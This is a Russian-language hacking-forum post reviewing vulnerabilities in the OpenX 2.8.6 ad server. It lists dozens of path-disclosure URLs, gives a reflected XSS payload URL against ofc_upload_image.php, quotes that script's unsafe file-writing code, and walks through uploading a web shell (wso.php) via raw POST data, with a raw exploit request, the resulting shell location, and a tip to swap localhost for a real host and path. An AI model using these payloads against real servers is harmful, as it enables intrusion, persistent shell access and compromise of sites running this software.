ANTICHAT - Показать сообщение отдельно - [ Обзор уязвимостей OpenX (phpAdsNew, Openads) ]

Уязвимости openX

openX 2.8.6

Path disclosure

http://localhost/openx-2.8.6/www/admin/plugins/openXWorkflow/application/bootstrap.php

Path disclosure

display_errors = On

Код:

http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-debug.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-api.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/stats-export-csv.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/navigation/oxVastMenuChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_base.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_hollow.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_area_line.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_bar_filled.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_line_dot.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_line_hollow.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_sugar.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis_right.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/SmartyFunctions/function.url.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/SmartyFunctions/modifier.formatNumber.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/AreaGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/BaseGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/Graph/Flash/LineGraph.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/oxMarket.class.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketActiveChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketAdminStatsChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketEntityChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketMultipleAccountsModeChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/navigation/oxMarketStandaloneModeChecker.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/Cache.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Common/ConnectionUtils.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Dal/Advertiser.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/Dal/Campaign.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/PearXmlRpcCustomClientExecutor.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/M2M/ZendXmlRpcCustomClientExecutor.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/CampaignForm.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/CampaignsSettings.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityFormManager.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityHelper.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/EntityScreenManager.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/rule/FloorPriceCompare.php
http://localhost/openx-2.8.6/www/admin/plugins/oxMarket/library/OX/oxMarket/UI/rule/QuickFormFloorPriceCompareRuleAdaptor.php
...
раскрытий много.

Path disclosure

display_errors = On

Код:

http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

барыжная XSS

Код:

http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=%3Cimg%20alt=%22%ED%E0%E6%EC%E8%22%20onmouseover=%22javascript:alert%28123%29%22%20%3E

ofc_upload_image.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/ 

// full path to the saved image including filename //

[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] );

echo[/COLOR][COLOR="#DD0000"]'Saving your image to: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]

Записываем шелл

ofc_upload_image.php

rg on

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/

// default path for the image to be stored //

[/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'../tmp-upload-images/'[/COLOR][COLOR="#007700"];

if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]mkdir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0777[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]// full path to the saved image including filename //

[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$default_path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]] );

echo[/COLOR][COLOR="#DD0000"]'Saving your image to: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]// print_r( $_POST );

// print_r( $_SERVER );

// echo $HTTP_RAW_POST_DATA;

//

// POST data is usually string data, but we are passing a RAW .png

// so PHP is a bit confused and $_POST is empty. But it has saved

// the raw bits into $HTTP_RAW_POST_DATA

//

[/COLOR][COLOR="#0000BB"]$jfh[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$destination[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"can't open file"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$jfh[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$HTTP_RAW_POST_DATA[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$jfh[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//

// LOOK:

//

[/COLOR][COLOR="#007700"]exit();

[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]

Если б небыло дальше exit(), то можно было лить шелл бес зависимости.

Код HTML:

будет текст:

Цитата:

Сообщение от None

Saving your image to: ../tmp-upload-images/wso.php

Шелл будет тут:

Код:

http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/tmp-upload-images/wso.php

localhost/openx-2.8.6 змаенить на [host]/[path]

скоро буду дальше смотреть(времени мало) ...

Решил почитать о $HTTP_RAW_POST_DATA

Оказуетцо, если register_globals off, то все же писать данные в файл возможно.

Только данные урл-кодируютцо, если не урл-кодированные, то мы имеем шелл.

Как послать данные не урл-кодированные думаю все вы знаете.

В $HTTP_RAW_POST_DATA заганяютцо пост-даные напрямую.

в php.ini должно быть

Цитата:

Сообщение от None

; Always populate the $HTTP_RAW_POST_DATA variable.
always_populate_raw_post_data = On

файл 1.php:

Код:

обращаемся:

Код:

http://localhost/1.php

результат:

data=12345

експлоит:

Код:

Цитата:

Сообщение от None

Host=localhost
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding=gzip,deflate
Accept-Charset=windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive
Referer=http://localhost/1.html
Cookie=vc=26; OAID=f3376b72128277e77c859bc6ca859fc7
Content-Type=application/x-www-form-urlencoded
Content-Length=21
POSTDATA=Name=

Наш шелл в даном случае тут:

Код:

http://localhost/openx-2.8.6/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=222.php

заменяем localhost/openx-2.8.6 на [host]/[path]

Хе-хе, самое интересное, когда пихать с атрибутом enctype, то нет никакого результата.

Код:

зы

PHP Version 5.2.14, нужная директива была закоментирована